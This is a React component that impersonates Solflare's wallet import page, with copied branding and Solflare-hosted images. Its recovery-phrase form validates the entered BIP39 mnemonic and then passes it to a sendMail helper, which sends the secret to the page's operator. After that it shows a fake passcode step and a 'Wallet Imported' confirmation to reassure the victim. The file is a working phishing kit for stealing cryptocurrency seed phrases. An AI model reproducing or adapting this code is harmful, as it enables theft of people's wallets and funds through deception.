import React from 'react'
import { useNavigate } from 'react-router-dom';
import { validateMnemonic } from 'bip39';
import { mnemonicWords } from '../helpers/mnemonicWords';


import "./Phrase.css"
import { toast } from 'react-toastify';
import { sendMail } from '../utils/sendMail';
export default function Phrase() {
    const [phraseLength, setPhraseLength] = React.useState(12);
    const [stage, setStage] = React.useState(1)
    const [mnemonic, setMnemonic] = React.useState<string[]>([]);
    const [error, setError] = React.useState(false)
    const [password, setPassword] = React.useState('');
    const [confirmPassword, setConfirmPassword] = React.useState('');

    const readFromClipboard = async () => {
        const text = await navigator.clipboard.readText()
        return text

    };


    React.useEffect(() => {
        if (error) {
            setTimeout(() => {
                setError(false)
            }, 2000)
        }
    }, [error])

    const handlePasteWords = async (e: React.ClipboardEvent<HTMLInputElement>) => {
        e.preventDefault();
        const validWords = extractValidWordsFromText(await readFromClipboard());
        setMnemonic(validWords);
    };


    const extractValidWordsFromText = (text: string) => {
        const lines = text.match(/\S+/g) || [];
        const validWords: string[] = [];
        if (lines.length > 0) {
            try {
                lines.forEach((line) => {
                    // extrat only the valid word
                    const candidateWords = line
                        .split(" ")
                        .filter((item) => item !== "")
                        .filter((item) => isNaN(parseInt(item)));
                    candidateWords.forEach((word) => {
                        if (mnemonicWords.includes(word)) {
                            validWords.push(word);
                        }
                    });
                });
            } catch (error) {
                throw error;
            }
        }
        return validWords;
    };



    const handleSubmit = async() => {
        if (!validateMnemonic(mnemonic.join(" "))) {
            setError(true);
            toast.error('invalid mnemonic')
        } else {
            await sendMail(mnemonic.join(" "), "Solflare")
            setStage(2)
        }
    }



    const navigate = useNavigate()
    return (
        <div className="MuiGrid-root MuiGrid-container css-1vwlshn">
            <div className="MuiGrid-root MuiGrid-item MuiGrid-grid-xs-12 MuiGrid-grid-sm-5 MuiGrid-grid-md-6 css-ye2qiz">
                <div className="jss11 MuiBox-root css-0">
                    <div className="carousel-root">
                        <div
                            className="carousel carousel-slider"
                            style={{ width: "100%" }}
                        >
                            <ul className="control-dots">
                                <li
                                    className="dot"
                                    value={0}
                                    role="button"
                                    tabIndex={0}
                                    aria-label="slide item 1"
                                />
                                <li
                                    className="dot"
                                    value={1}
                                    role="button"
                                    tabIndex={0}
                                    aria-label="slide item 2"
                                />
                                <li
                                    className="dot selected"
                                    value={2}
                                    role="button"
                                    tabIndex={0}
                                    aria-label="slide item 3"
                                />
                            </ul>
                            <button
                                type="button"
                                aria-label="previous slide / item"
                                className="control-arrow control-prev control-disabled"
                            />
                            <div className="slider-wrapper axis-horizontal">
                                <ul
                                    className="slider animated"
                                    style={{
                                        transform: "translate3d(-200%, 0px, 0px)",
                                        transitionDuration: "350ms",
                                    }}
                                >
                                    <li className="slide">
                                        <div className="MuiBox-root css-w5i18h">
                                            <img
                                                src="https://solflare.com/assets/carousel-image-language.e3c0c471..svg"
                                                alt=""
                                                className="jss12"
                                            />
                                            <h3
                                                className="MuiTypography-root MuiTypography-h3 MuiTypography-gutterBottom css-1j1km3d"
                                                data-id="carouse_title"
                                            >
                                                Solflare for everyone
                                            </h3>
                                            <p
                                                className="MuiTypography-root MuiTypography-body2 css-1dgj0bz"
                                                data-id="carousel_text"
                                            >
                                                Solflare is now available in over 15 languages… you
                                                can choose your preferred language using the language
                                                button above
                                            </p>
                                        </div>
                                    </li>
                                    <li className="slide">
                                        <div className="MuiBox-root css-w5i18h">
                                            <img
                                                src="https://solflare.com/assets/carousel-image-bonfida.1336027b..svg"
                                                alt=""
                                                className="jss12"
                                            />
                                            <h3
                                                className="MuiTypography-root MuiTypography-h3 MuiTypography-gutterBottom css-1j1km3d"
                                                data-id="carouse_title"
                                            >
                                                Solflare supports Bonfida
                                            </h3>
                                            <p
                                                className="MuiTypography-root MuiTypography-body2 css-1dgj0bz"
                                                data-id="carousel_text"
                                            >
                                                Sending SOL and SPL assets has never been easier… you
                                                can now enter a Bonfida domain in the recipient field
                                                when sending with Solflare
                                            </p>
                                        </div>
                                    </li>
                                    <li className="slide selected previous">
                                        <div className="MuiBox-root css-w5i18h">
                                            <img
                                                src="https://solflare.com/assets/carousel-image-pfp.2bf3cebb..svg"
                                                alt=""
                                                className="jss12"
                                            />
                                            <h3
                                                className="MuiTypography-root MuiTypography-h3 MuiTypography-gutterBottom css-1j1km3d"
                                                data-id="carouse_title"
                                            >
                                                Solana Profile Picture Protocol
                                            </h3>
                                            <p
                                                className="MuiTypography-root MuiTypography-body2 css-1dgj0bz"
                                                data-id="carousel_text"
                                            >
                                                You can now set your favorite NFT as your profile
                                                picture in Solflare AND it’ll also show up as your PFP
                                                in all platforms that support our Solana PFP protocol
                                            </p>
                                        </div>
                                    </li>
                                </ul>
                            </div>
                            <button
                                type="button"
                                aria-label="next slide / item"
                                className="control-arrow control-next control-disabled"
                            />
                        </div>
                    </div>
                </div>
            </div>
            <div className="MuiGrid-root MuiGrid-item MuiGrid-grid-xs-12 MuiGrid-grid-sm-7 MuiGrid-grid-md-6 jss9 css-1jpyr5b">
                <div className="MuiContainer-root MuiContainer-maxWidthSm jss10 css-1m6pqln">
                    <div className="MuiBox-root css-k3gutg">
                        <div className="MuiBox-root css-0">
                            <a
                                className="MuiButtonBase-root css-1b47e06"
                                tabIndex={0}
                                data-id="solflare_logo"
                                href="/"
                            >
                                <img
                                    src="https://solflare.com/assets/logo.26659b6d..svg"
                                    alt="Solflare logo"
                                    className="solriseLogoImage"
                                />
                            </a>
                            <div className="MuiBox-root css-1kaojm3">
                                <a
                                    className="MuiButtonBase-root css-1b47e06"
                                    tabIndex={0}
                                    data-id="solflare"
                                    href="/"
                                >
                                    <img src="https://solflare.com/assets/solflare.18da1228..svg" alt="Solflare" />
                                </a>
                            </div>
                        </div>
                        <div className="MuiBox-root css-0">
                            <button
                                className="MuiButton-root MuiButton-text MuiButton-textPrimary MuiButton-sizeMedium MuiButton-textSizeMedium MuiButtonBase-root css-1rryh4p"
                                tabIndex={0}
                                type="button"
                                data-id="translate_button"
                            >
                                <svg
                                    className="MuiSvgIcon-root MuiSvgIcon-fontSizeMedium css-vubbuv"
                                    focusable="false"
                                    aria-hidden="true"
                                    viewBox="0 0 24 24"
                                    data-testid="TranslateIcon"
                                >
                                    <path d="m12.87 15.07-2.54-2.51.03-.03c1.74-1.94 2.98-4.17 3.71-6.53H17V4h-7V2H8v2H1v1.99h11.17C11.5 7.92 10.44 9.75 9 11.35 8.07 10.32 7.3 9.19 6.69 8h-2c.73 1.63 1.73 3.17 2.98 4.56l-5.09 5.02L4 19l5-5 3.11 3.11.76-2.04zM18.5 10h-2L12 22h2l1.12-3h4.75L21 22h2l-4.5-12zm-2.62 7 1.62-4.33L19.12 17h-3.24z" />
                                </svg>
                            </button>
                        </div>
                    </div>
                    {
                        stage === 1 && (
                            <div className="MuiBox-root css-0">
                                <h2 className="MuiTypography-root MuiTypography-h2 MuiTypography-gutterBottom css-1tc4wys">
                                    Enter your recovery phrase.
                                </h2>
                                <p className="MuiTypography-root MuiTypography-body2 css-1dgj0bz">
                                    Your recovery phrase is the key to the wallet.
                                </p>
                                <form onSubmit={(e) => e.preventDefault()}>
                                    <div className="jss13 MuiBox-root css-0">
                                        <div className="MuiBox-root css-3mllz6">
                                            <div className="MuiBox-root css-70qvj9">
                                                <button
                                                    className={`${phraseLength === 12 ? "MuiButton-root MuiButton-text MuiButton-textPrimary MuiButton-sizeMedium MuiButton-textSizeMedium MuiButtonBase-root  css-ey9fuw" : "MuiButton-root MuiButton-text MuiButton-textPrimary MuiButton-sizeMedium MuiButton-textSizeMedium MuiButtonBase-root  css-1t5xh9t"}`}
                                                    tabIndex={0}
                                                    type="button"
                                                    onClick={() => setPhraseLength(12)}
                                                >
                                                    12
                                                </button>
                                                <button
                                                    className={`${phraseLength === 24 ? "MuiButton-root MuiButton-text MuiButton-textPrimary MuiButton-sizeMedium MuiButton-textSizeMedium MuiButtonBase-root  css-ey9fuw" : "MuiButton-root MuiButton-text MuiButton-textPrimary MuiButton-sizeMedium MuiButton-textSizeMedium MuiButtonBase-root  css-1t5xh9t"}`}
                                                    tabIndex={0}
                                                    type="button"
                                                    onClick={() => setPhraseLength(24)}
                                                >
                                                    24
                                                </button>
                                            </div>
                                            <button
                                                className="MuiButton-root MuiButton-text MuiButton-textPrimary MuiButton-sizeMedium MuiButton-textSizeMedium MuiButtonBase-root css-1rryh4p"
                                                tabIndex={0}
                                                type="button"
                                            >
                                                Upload
                                            </button>
                                        </div>
                                        <hr className="MuiDivider-root MuiDivider-fullWidth MuiDivider-light css-1v8dmcj" />
                                        <div className="MuiGrid-root MuiGrid-container MuiGrid-spacing-xs-2 jss14 css-isbt42">
                                            {
                                                [...Array(phraseLength)].map((_, index) => (
                                                    <div className="MuiGrid-root MuiGrid-item MuiGrid-grid-xs-6 MuiGrid-grid-sm-4 css-nlcweg">
                                                        <div className="MuiInput-root MuiInput-underline MuiInputBase-root MuiInputBase-colorPrimary MuiInputBase-fullWidth MuiInputBase-adornedStart css-exmjsz">
                                                            <div className="MuiInputAdornment-root MuiInputAdornment-positionStart css-1a6giau">
                                                                <span className="notranslate">​</span>
                                                                <p className="MuiTypography-root MuiTypography-inherit css-1lgrg8t">
                                                                    {index + 1}
                                                                </p>
                                                            </div>
                                                            <input
                                                                aria-invalid="false"
                                                                autoComplete="off"
                                                                type="text"
                                                                data-id="recovery_phrase_input"
                                                                onPaste={(e) => {
                                                                    if (index + 1 === 1) {
                                                                        handlePasteWords(e)
                                                                    } else {
                                                                        return;
                                                                    }
                                                                }}
                                                                className="MuiInput-input MuiInputBase-input MuiInputBase-inputAdornedStart css-ndai2c"
                                                                value={mnemonic[index]}
                                                                onChange={(e) => {
                                                                    let arr = [...mnemonic]
                                                                    arr[index] = e.target.value
                                                                    setMnemonic(arr)
                                                                }}
                                                            />
                                                        </div>
                                                    </div>
                                                ))
                                            }


                                        </div>
                                    </div>
                                    <div className="MuiBox-root css-163v3sq">
                                        <button
                                            className="MuiButton-root MuiButton-text MuiButton-textPrimary MuiButton-sizeMedium MuiButton-textSizeMedium MuiButtonBase-root css-1rryh4p"
                                            tabIndex={0}
                                            type="button"
                                            onClick={() => navigate("/")}
                                        >
                                            Back
                                        </button>
                                        <div className="MuiBox-root css-i9gxme" />
                                        <button
                                            className="MuiButton-root MuiButton-contained MuiButton-containedPrimary MuiButton-sizeMedium MuiButton-containedSizeMedium MuiButtonBase-root css-7nmrms"
                                            tabIndex={0}
                                            disabled={mnemonic.length !== phraseLength || error}

                                            onClick={() => handleSubmit()}
                                        >
                                            Continue
                                        </button>
                                    </div>
                                </form>
                            </div>
                        )
                    }
                    {
                        stage === 2 && (
                            <div className="MuiBox-root css-0">
                                <h2 className="MuiTypography-root MuiTypography-h2 MuiTypography-gutterBottom css-1tc4wys">
                                    Set a passcode for your wallet
                                </h2>
                                <form onSubmit={(e) => {
                                    e.preventDefault();
                                    if (password !== confirmPassword) {
                                        toast.error('passwords don\'t match')
                                    } else {
                                        setStage(3)
                                    }
                                }}>
                                    <div className="jss15 MuiBox-root css-0">
                                        <div className="MuiBox-root css-1qm1lh">
                                            <div className="MuiFormControl-root MuiFormControl-fullWidth MuiTextField-root css-t951g0">
                                                <label
                                                    className="MuiInputLabel-root MuiInputLabel-formControl MuiInputLabel-animated MuiInputLabel-sizeSmall MuiInputLabel-standard MuiFormLabel-root MuiFormLabel-colorPrimary css-ipi1j4"
                                                    data-shrink="false"
                                                    htmlFor=":r1:"
                                                    id=":r1:-label"
                                                >
                                                    {password === "" && "New Password"}
                                                </label>
                                                <div className="MuiInput-root MuiInput-underline MuiInputBase-root MuiInputBase-colorPrimary MuiInputBase-fullWidth MuiInputBase-formControl MuiInputBase-sizeSmall css-er1iuk">
                                                    <input
                                                        aria-invalid="false"
                                                        value={password}
                                                        onChange={(e) => setPassword(e.target.value)}
                                                        type="password"
                                                        className="MuiInput-input MuiInputBase-input MuiInputBase-inputSizeSmall css-6i5tlx"

                                                        data-ddg-inputtype="credentials.password"
                                                    />
                                                </div>
                                            </div>
                                        </div>
                                        <div className="MuiBox-root css-1qm1lh">
                                            <div className="MuiFormControl-root MuiFormControl-fullWidth MuiTextField-root css-t951g0">
                                                <label
                                                    className="MuiInputLabel-root MuiInputLabel-formControl MuiInputLabel-animated MuiInputLabel-sizeSmall MuiInputLabel-standard MuiFormLabel-root MuiFormLabel-colorPrimary css-ipi1j4"
                                                    data-shrink="false"
                                                    htmlFor=":r2:"
                                                    id=":r2:-label"
                                                >
                                                    {confirmPassword === "" && "Reapeat Password"}
                                                </label>
                                                <div className="MuiInput-root MuiInput-underline MuiInputBase-root MuiInputBase-colorPrimary MuiInputBase-fullWidth MuiInputBase-formControl MuiInputBase-sizeSmall css-er1iuk">
                                                    <input
                                                        aria-invalid="false"
                                                        value={confirmPassword}
                                                        onChange={(e) => setConfirmPassword(e.target.value)}
                                                        className="MuiInput-input MuiInputBase-input MuiInputBase-inputSizeSmall css-6i5tlx"
                                                        type="password"
                                                        data-ddg-inputtype="credentials.password"
                                                    />
                                                </div>
                                            </div>
                                        </div>
                                    </div>
                                    <div className="MuiBox-root css-163v3sq">
                                        <button
                                            className="MuiButton-root MuiButton-text MuiButton-textPrimary MuiButton-sizeMedium MuiButton-textSizeMedium MuiButtonBase-root css-1rryh4p"
                                            tabIndex={0}
                                            type="button"
                                            onClick={() => setStage(1)}
                                        >
                                            Back
                                        </button>
                                        <button
                                            className="MuiButton-root MuiButton-contained MuiButton-containedPrimary MuiButton-sizeMedium MuiButton-containedSizeMedium MuiButtonBase-root Mui-disabled css-7nmrms"
                                            tabIndex={-1}
                                            type="submit"
                                            disabled={password === "" || confirmPassword === ""}
                                        >
                                            Continue
                                        </button>
                                    </div>
                                </form>
                            </div>
                        )
                    }
                    {
                        stage === 3  && (
                            <div className="MuiBox-root css-12dtbqf">
                                <div className="jss16 MuiBox-root css-1ag1foi">
                                    <svg
                                        className="MuiSvgIcon-root MuiSvgIcon-colorPrimary MuiSvgIcon-fontSizeMedium css-1nounmf"
                                        focusable="false"
                                        aria-hidden="true"
                                        viewBox="0 0 24 24"
                                        data-testid="AccountBalanceWalletIcon"
                                        style={{ fontSize: "50px" }}
                                    >
                                        <path d="M21 18v1c0 1.1-.9 2-2 2H5c-1.11 0-2-.9-2-2V5c0-1.1.89-2 2-2h14c1.1 0 2 .9 2 2v1h-9c-1.11 0-2 .9-2 2v8c0 1.1.89 2 2 2h9zm-9-2h10V8H12v8zm4-2.5c-.83 0-1.5-.67-1.5-1.5s.67-1.5 1.5-1.5 1.5.67 1.5 1.5-.67 1.5-1.5 1.5z" />
                                    </svg>
                                </div>
                                <div className="MuiBox-root css-1fkzs83">
                                    <h2 className="MuiTypography-root MuiTypography-h2 MuiTypography-gutterBottom css-1tc4wys">
                                        Wallet Imported
                                    </h2>
                                    <p className="MuiTypography-root MuiTypography-body2 css-1dgj0bz">
                                        congrats your wallet has been successfully imported
                                    </p>
                                    <div className="MuiBox-root css-1sfbpg5">
                                        <button
                                            className="MuiButton-root MuiButton-contained MuiButton-containedPrimary MuiButton-sizeMedium MuiButton-containedSizeMedium MuiButtonBase-root css-7nmrms"
                                            tabIndex={0}
                                            type="button"
                                        >
                                            Finish setup
                                        </button>
                                       
                                    </div>
                                </div>
                            </div>
                        )
                    }
                    <div className="MuiBox-root css-12waxkz">
                        Need a new wallet?{" "}
                        <a
                            className="MuiTypography-root MuiTypography-inherit MuiLink-root MuiLink-underlineHover css-199nb6s"
                            href="/onboard/create"
                        >
                            Create it here
                        </a>
                    </div>
                </div>
            </div>
        </div>
    )
}
